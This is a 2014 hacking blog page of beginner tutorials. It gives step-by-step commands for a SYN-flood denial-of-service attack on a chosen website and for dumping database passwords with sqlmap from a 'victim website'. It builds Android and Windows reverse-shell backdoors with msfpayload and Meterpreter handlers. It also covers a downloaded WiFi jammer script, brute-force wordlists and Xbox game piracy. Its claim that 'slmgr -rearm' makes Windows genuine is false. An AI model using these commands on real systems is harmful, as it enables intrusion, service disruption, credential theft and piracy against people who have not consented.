Skip to main content

Posts

Showing posts from 2014

DOWNLOAD AN WORD-LIST OF 1.1 MILLION WORD'S

WORDLIST :- WORLISTS IS AN FILE WHICH CONTAINS ALL POSSIBILITY OF WORD'S. THESE ARE USED FOR HACKING LIKE :-AIRCRACK -NG ,HACKING WINDOWS ,BURTE FORCE ATTACK HERE IS THE WORDLIST WHICH I HAVE CREATED OF 1.1MILLION WORD'S DOWNLOAD LINK :- https://mega.co.nz/#!twQQkYAT!FwK-s5QcHXZrr2VC8eEFLCLWqE0t8gR_qMs1wuqgZAQ                                                                                   THANK YOU

DOWNLAOD KALI LINUX AND BACKTRACK GUIDANCE BOOK'S--COOK BOOKS FOR HACKING

ABOUT KALI LINUX COOK BOOK:- REVIEW:-   Over 70 recipes to help you master Kali Linux for effective penetration security testing Overview Recipes designed to educate you extensively on the penetration testing principles and Kali Linux tools Learning to use Kali Linux tools, such as Metasploit, Wire Shark, and many more through in-depth and structured instructions Teaching you in an easy-to-follow style, full of examples, illustrations, and tips that will suit experts and novices alike DOWNLOAD LINK -->   https://mega.co.nz/#!EpgnhIJR!yK1EDRcwBm5mtG4jNsXgW-RxZdKst7UygEqEM4DF4Oo ABOUT  BACKTRACK  COOK BOOK:- REVIEW:- Learn to perform penetration tests with BackTrack 5 Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 Tools Provides detailed step-by-step instructions on the usage of many of BackTrack’s popular and not-so- popular tools DOWNLOAD LINK  --> https://mega.co.nz/#!5xokFIKL...

MAKING WINDOWS GENUINE

THINGS YOU NEED :- 1) CMD (COMMAND PROMPT) NOW LETS GET STARTED..... NOW IF YOUR WINDOWS IS NOT GENUINE THAT MEANS THAT YOUR ARE STILL RUNNING ON AN TRIAL VERSIONS OR SOME THING...... FOR SOME PEOPLE, THE COMPUTER WILL WORK FOR EVER BUT, DO NOT ALLOW SOME OF THE WINDOWS FEATURES LIKE  YOU WILL NOT BE ABLE TO SET AN WALLPAPER.... EVEN IF DO, IT WONT LAST FOR LONG TIME IF YOUR WINDOWS IS NOT GENUINE THEN IT WILL LOOK SOME WHAT LIKE THIS now,what you need to do is  go to  start-->run-->cmd after opening the cmd now type:-  slmgr -rearm now hit enter now,it will say to restart your system then just do it the from that your windows will become genuine                          THANK YOU

HOW TO UPGRADE KALI LINUX TO 1.0.6 TO 1.0.7

THINGS YOU NEED:- 1) KALI LINUX (ANY VERSION BUT NOT 1.0.7) 2) INTERNET CONNECTION NOW LETS GET STARTED.... NOW, START THE KALI LINUX AND OPEN UP AN TERMINAL NOW, TYPE:- apt-get dist-upgrade FOR SOME OF YOU IT MAY ASK [ Y/N ] JUST TYPE "Y" AND HIT ENTER                                                                                      THANK YOU

HOW TO DOS ATTACK AN WEBSITE USING KALI LINUX

THINGS WE NEED:- 1)KALI LINUX 2)METASPLOIT(MSFCONSOLE) 3)WEBSITE TO HACK NOW LETS GET STARTED...... NOW FIRST SELECT AN WEBSITE WHICH YOU WANT TO DSO ATTACK IT AFTER SELECTING OPEN AN TERMINAL AND TYPE :-PING WEBSITENAME.COM EXAMPLE :- PING GOOGLE.COM YOU WILL FIND SOME THING LIKE THIS NOW COPY OR NOTE THE IP ADDRES OF THE SITE GIVEN IN( ) IN THE SECOND LINE NOW OPEN AN TERMINAL AND TYPE:-   msfconsole NOW  TYPE:-use auxiliary/dos/tcp/synflood                                                                                                     NOW TYPE :- set INTERFACE ETH0(OR) WLAN0(OR) L0 (ENTER YOUR INTERFACE) AND NOW TYPE:- set RHOST  IP ADDRESS OF THE SITE  NOW TPYE:-   exploi...

HOW TO PATCH XBOX 360 GAMES USING ABGX360 AND PLAY (NO MOD CHIPPING)

THINGS WE NEED :- 1)XBOX 360 2)ABGX360 ( PATCHING SOFTWARE) 3)IMGBURN(TO WRITE IMAGE FILE TO DISC) 4) XBOX 360 GAME ISO FILE 5)DUAL LAYER DVD'S (THESE ARE THE ONCE WHICH XBOX CAN READ) TO DOWNLOAD THE ABOVE SOFTWARE'S GO TO ~ABGX360---> http://abgx360.net/download.php ~IMGBURN---> http://imgburn.com/index.php?act=download TO DUAL LAYER DVD'sGO TO INDIA--> http://www.flipkart.com/verbatim-dvd-r-dl-8-5gb-10-pack-spindle/p/itmczzcanjdg7vgv?pid=ACCCZZC9QQZEJSUV&otracker=from-search&srno=t_1&query=8gb+dvd&ref=6c0a22ab-dbdb-4e3b-8d23-99adaa918f5c USA--> http://www.amazon.com/Verbatim-Double-Recordable-3-Disc-95014/dp/B0002LEMWE NOTE:- THIS WILL ONLY WORK FOR COMPUTER'S WHICH CAN BURN OR READ DUAL LAYER DVD'S ONLY TO CHECK THAT YOU CAN DOWNLOAD NERO INFO TOOL HERE IS THE LINK--> http://www.nero.com/enu/support-nero8-tools-utilities.html NOW LET'S GET STARTED....... HERE THE MAIN THING YOU  NEED IS THE GAME ISO FIL...

HACKING AN WEBSITE USING SQL MAPPING

THINGS YOU NEED:- 1)KALI LINUX (OR) BACKTRACK 2)SQLMAP  3)A WEB SITE TO HACK NOTE:- HERE WE SHOULD KNOW THAT THE WEBSITE SHOULD BE  venerable TO SQL MAP TO KNOW THAT THE WEBSITE IS VENERABLE TO HAVE ADD THIS THING TO THE WEBSITE AT LAST----->    /page.php?id=1 now open an  terminal and type:- sqlmap -u http://www. yourvictimwebsite .com/page.php?id=1 --dbs then you will find  something like this here www and information_schema are called as data bases  now open a terminal and type:-  sqlmap -u http://www.yourvictimwebsite .com/page.php?id=1 -D www --tables here we are using www data base now after typing the above command you will find some thing like this at bottom of the terminal now to get the user name and passwords for passwords--> es_cms_gb_login for user name--> es-cms_users    here i want to go for password so, i am going for   es_cms_gb_login type in :-  sqlmap -u ...

HACKING ANDROID WITH KALI LINUX

THINGS WE NEED :- 1) KALI LINUX {OR} BACKTRACK 2)METERPRETER NOW LETS GET STARTED ............... PROCEDURE :- 1)   Open a terminal and type: msfconsole 2) now open an another terminal and type: msfpayload android/meterpreter/reverse_tcp LHOST= your ip address  LPORT=81  R > evil.apk note:- this file evil.apk is an backdoor virus file it should be implanted in the victim's android phone 3) now, get back to the first terminal witch has msfconsole running in it and type ::: msf  > use multi/handler 4)then type: msf > exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp 5)now type msf  exploit(handler) > set LHOST your ip address  and msf exploit(handler) >  set LPORT 81 then type msf exploit(handler) > exploit location:- places===>home folder====>evil.apk when you hit enter after typing exploit you will see like this [*] started reverse handler on you...

HACKING WINDOWS 8 USING KALI LINUX

HELLO HERE TO HACK AN WINDOWS 8 WE  ARE GOING TO CREATE A BACK DOOR VIRUS.....! THINGS YOU NEED : 1) KALI LINUX( BECAUSE IT IS MOST UPDATED THAN BACKTRACK 5 R3) 2)NET CONNECTION 3)AND ..........................................................................AN VICTIM NOW LETS GET STARTED PROCESS: OPEN A TERMINAL AND TYPE:: msfconsole THEN TYPE:: msf > use windows/smb/ms08_067_netapi NOW OPEN AN NEW TERMINAL AND TYPE:: msfpayload windows/meterpreter/reverse_tcp LHOST=your ip address LPORT=4444 x > /usr/info.exe NOW GO TO COMPUTER --------SYSTEM FILES--------USR-------------INFO.EXE(THE BACKDOOR VIRUS FILE)                YOU NEED TO INSTALL THIS FILE IN YOUR VICTIM COMPUTER NOW GET BACK TO THE 1ST TERMINAL THEN TYPE msf exploit(m08_067_netapi) > use multi/handler THEN TYPE: msf exploit (handler) > set LHOST your ip adress THEN TYPE: msf exploit (handler) > set LPORT 4444 T...

BEST METERPRETER COMMANDS

How to Hack: Ultimate Metasploit Meterpreter Command  Many of you have probably heard about the MetaSploit Meterpreter Shell. A number of you have probably even used it. But some of you are probably wondering, “What are all the commands for Meterpreter?” Well, here we have a comprehensive list of all the different commands you can use withing Metasploit Meterpreter. You may want to print this out or bookmark it for future reference. Step 1: Core Commands At its most basic use, meterpreter is a Linux terminal on the victim’s computer. As such, many of our basic Linux commands can be used on the meterpreter even if it’s on a Windows or other operating system. Here are some of the core commands we can use on the meterpreter. ? - help menu background - moves the current session to the background bgkill - kills a background meterpreter script bglist - provides a list of all running background scripts bgrun - runs a script as a background thread channel - display...

WIFI JAMMER (BACKTRACK OR KALI LINUX)

things you need:  1) backtrack 5 (or) kali linux 2) wireless router (inorder to get wifi networks) now,lets get started................... PROCESS: Commands Used: Open a Terminal and type in: wget http://wifijammer.googlecode.com/files/wifijammer_0.1.sh Then type: chmod +x wifijammer_0.1.sh Then type: ./wifijammer_0.1.sh wlan0 Then type: scan Let it find all the networks.... When asked for the channel type in the channel of the wireless network. When you wanna stop the WiFi Jammer Press CTRL+C on the Terminals.